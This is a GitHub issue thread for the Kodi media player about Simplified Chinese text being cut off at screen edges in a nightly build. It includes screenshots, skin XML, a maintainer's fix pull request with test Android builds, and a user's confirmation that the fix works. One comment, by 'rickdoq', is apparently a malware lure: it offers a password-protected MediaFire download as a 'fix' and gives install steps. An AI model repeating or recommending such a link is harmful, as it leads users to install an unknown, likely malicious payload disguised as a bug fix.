### ISSUE TITLE
The edge text(Simplified Chinese) is blocked and incompletely displayed.

### ISSUE THREAD

**Issue by yangloft** [xbmc/xbmc#25684]
### Describe the bug
Here is a clear and concise description of what the problem is:
The edge text is blocked and incompletely displayed.

## Expected Behavior
Here is a clear and concise description of what was expected to happen:
kodi-21.0-Omega is ok:
![kodi-21 0-Omega-p1](https://github.com/user-attachments/assets/dabb114b-f196-48e6-a120-6734004fe6df)
![kodi-21 0-Omega-p2](https://github.com/user-attachments/assets/5cc5a6cf-84cd-49dd-8747-829d95d48f05)
![kodi-21 0-Omega-p3](https://github.com/user-attachments/assets/b205581f-8d48-459b-a6a7-fac6aed5e67e)

## Actual Behavior
Kodi-20240828 Nightly, The edge text is blocked and incompletely displayed.
![Kodi-20240828-p1](https://github.com/user-attachments/assets/fff18806-ee92-4611-93f5-4f0d879daf6d)
![Kodi-20240828-p2](https://github.com/user-attachments/assets/6807d5a6-c23f-4b5b-8656-a3ce67c73563)
![Kodi-20240828-p3](https://github.com/user-attachments/assets/fcef9e72-3af9-43f3-aa0a-431a9aff9f07)

### Your Environment
Used Operating system:
Android TV(android 11) & Windows(Win 11) has same problem
Kodi version: Kodi-20240828 Nightly
![Kodi-20240828-info](https://github.com/user-attachments/assets/b18ffa1b-0656-425b-a5bc-6168d20aa010)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Hitcher** [comment]
Ping [CastagnaIT](https://github.com/CastagnaIT)

**Comment by CastagnaIT** [comment]
@Hitcher  if you use a link instead of "@+name" the ping will not work

@Hitcher are you able to show me what xml settings use the skin on the Label control of plot?

its possible that its related around to #24905
only asian fonts are affected?

**Comment by Hitcher** [comment]
For the side panel: MyVideoNav.xml lines 46-54
For video info: DialogVideoInfo.xml lines 127-135

**Comment by london-saito** [comment]
This is clearly a 21.1 problem.
This is a problem for 2byte characters such as Asian.

**Comment by scott967** [comment]
I reproduced this error on Master Kodi 22 240616 nightly I had around and this control:
```
<control type="textbox">
    <top>450</top>
    <left>40</left>
    <width>395</width>
    <height>500</height>
    <align>justify</align>
    <label fallback="19055">$INFO[ListItem.Plot,,[CR][CR]  ]</label>
    <autoscroll delay="10000" time="1600" repeat="10000">true</autoscroll>
    <font>font12</font>
    <textcolor>FFDDDDDD</textcolor>
</control>
```
using default arial.ttf.  As mentioned in the closed issue I also see wrong text wrapping of Japanese (wrapping after open bracket)

**Comment by scott967** [comment]
[240616 (left) 240302 (right)](https://imgur.com/a/yHxh2sH)

**Comment by CastagnaIT** [comment]
fix pr #25693 done if someone can confirm

here some test build for android:
https://jenkins.kodi.tv/job/android-arm64-docker/7574/artifact/kodi-20240902-e863547d-PR25693-arm64-v8a.apk
https://jenkins.kodi.tv/job/android-arm-docker/7772/artifact/kodi-20240902-e863547d-PR25693-armeabi-v7a.apk

**Comment by london-saito** [comment]
CastagnaIT

> fix pr #25693 done if someone can confirm
> 
> here some test build for android: https://jenkins.kodi.tv/job/android-arm64-docker/7574/artifact/kodi-20240902-e863547d-PR25693-arm64-v8a.apk https://jenkins.kodi.tv/job/android-arm-docker/7772/artifact/kodi-20240902-e863547d-PR25693-armeabi-v7a.apk

This problem has been fixed!!
Thank You
